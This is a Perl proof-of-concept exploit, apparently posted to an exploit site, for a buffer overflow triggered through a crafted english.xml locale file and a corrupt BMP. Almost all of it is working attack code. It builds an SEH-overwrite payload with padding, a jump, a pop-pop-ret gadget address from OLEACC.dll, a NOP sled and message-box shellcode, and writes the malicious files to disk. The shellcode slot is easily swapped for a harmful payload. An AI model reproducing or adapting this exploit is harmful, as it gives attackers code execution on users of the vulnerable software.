I saw the notice for this CVE today but there was no known published expoits so
This particular BOF takes advantage of insecure handling of the english.xml file
sub write_file {
my ($file, $buffer) = @_;
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file [" . $file . "] created\n";
print "Buffer size: " . length($buffer) . "\n";
}
# create bmp file header; needs to be a valid header to generate necessary error
sub bmp_header {
my $header = "\x42\x4d"; # BM
$header = $header . "\x46\x00\x00\x00"; # file size (70 bytes)
$header = $header . "\x00\x00\x00\x00"; # unused
$header = $header . "\x36\x00\x00\x00"; # bitmap offset
$header = $header . "\x28\x00\x00\x00"; # header size
$header = $header . "\x02\x00\x00\x00"; # width
$header = $header . "\x02\x00\x00\x00"; # height
$header = $header . "\x01\x00"; # num of color planes
$header = $header . "\x18\x00"; # num of bits per pixel
$header = $header . "\x00\x00\x00\x00"; # compression (none)
$header = $header . "\x10\x00\x00\x00"; # image size
$header = $header . "\x13\x0b\x00\x00"; # horizontal resolution (2,835 pixels/meter)
$header = $header . "\x13\x0b\x00\x00"; # vertical resolution (2,835 pixels/meter)
$header = $header . "\x00\x00\x00\x00"; # colors in palette
$header = $header . "\x00\x00\x00\x00"; #important colors
return $header;
}
## Construct the corrupted bmp file which will trigger the vuln
my $header = bmp_header();
my $data = "\x41" x (5000 - length($header)); # arbitrary file data filler
my $buffer = $header.$data;
write_file("corrupt.bmp", $buffer);
# construct the buffer payload for our xml file
my $buffsize = 100000;
my $junk = "\x41" x 62504; # offset to next seh at 568
my $nseh = "\xeb\x32\x90\x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack('V', 0x74c82f4f); # : pop ebp pop ebx ret
# ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\WINDOWS\system32\OLEACC.dll)
my $junk2 = "\x41" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button
my $nops = "\x90" x 100;
# this is just a POC shellcode that displays a messagebox using the FatalAppExit function
my $shell = "\xb9\x7c\xec\xa5\x7c" . # Unicode String "FailSilently" (address may vary)
"\x31\xc0" . # xor eax, eax
"\xbb\xb2\x1b\x86\x7c" . # kernel32.dll FatalAppExit()
"\x51" . # push ecx
"\x50" . # push eax
"\xff\xd3"; # call ebx
my $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk
$sploit = $sploit.$fill; # assemble the final buffer
# build the malicious xml file
my $xml = '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">';
$xml = $xml . $sploit;
$xml = $xml . '</message></warning></image></corrupt></exception></locale>';
my $buffer = $xml;
write_file("english.xml", $buffer);
# 0day.today [2018-04-13] #